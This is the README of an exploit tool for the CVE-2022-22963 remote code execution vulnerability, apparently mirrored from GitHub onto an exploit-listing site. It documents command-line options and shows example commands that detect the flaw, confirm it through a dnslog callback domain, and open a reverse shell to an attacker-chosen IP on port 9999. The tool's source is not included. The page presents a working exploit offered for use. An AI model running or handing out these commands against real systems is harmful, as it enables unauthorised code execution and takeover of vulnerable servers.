Share
## https://sploitus.com/exploit?id=44AC6EA1-B046-5CD3-8E85-AAF1A5224906
# CVE-2022-22963
### 一、工具描述
可用于检测CVE-2022-22963 代码远程执行漏洞,支持dnslog验证和反弹shell利用
### 二、工具说明
1.使用环境:python3
2.参数说明:
| 参数 | 参数说明 |
| :--------------------------------------- | ----------------------------------------------- |
| -h,--help | 帮助信息 |
| -u,--url | 用于检测漏洞的目标URL |
| -v,--check | 检测是否存在漏洞 |
| -m {dnslog,shell}, --mode {dnslog,shell} | 两种利用方式,一种为dnslog测试,一种为反弹shell |
| -i,--ip | 用于指定反弹shell的ip地址,与-m参数结合使用 |
| -d,--dns | 用于指定dnslog测试的地址,与-m参数结合使用 |
### 三、工具演示
1、帮助信息说明
python3 CVE-2022-22963.py -h
<img width="765" alt="image" src="https://github.com/xmqaq/CVE-2022-22963/assets/50257557/a8e6b09a-bee2-4f70-9978-aa0d33bdeb4d">
2、漏洞检测
python3 CVE-2022-22963.py -u http://127.0.0.1 -v
<img width="795" alt="image" src="https://github.com/xmqaq/CVE-2022-22963/assets/50257557/d8cf5807-7c5e-405c-9643-570523159761">
3.dnslog验证利用
python3 CVE-2022-22963.py -u http://127.0.0.1:8080 -m dnslog -d xmqaq.p5li4r.dnslog.cn
<img width="1028" alt="image" src="https://github.com/xmqaq/CVE-2022-22963/assets/50257557/2401bacc-d0a4-46e9-a860-a58414d24c26">
<img width="740" alt="image" src="https://github.com/xmqaq/CVE-2022-22963/assets/50257557/a93fc69d-e8e3-4c8d-a10c-d274216370bc">
4.反弹shell利用(默认设置为9999端口)
python CVE-2022-22963.py -u http://127.0.0.1:8080 -m shell -i 127.0.0.1
<img width="980" alt="image" src="https://github.com/xmqaq/CVE-2022-22963/assets/50257557/b5a1dd93-9940-4742-a174-6df594b3fda6">
<img width="610" alt="image" src="https://github.com/xmqaq/CVE-2022-22963/assets/50257557/e4da3b1b-ceda-4ffa-b0c3-95afeacfa332">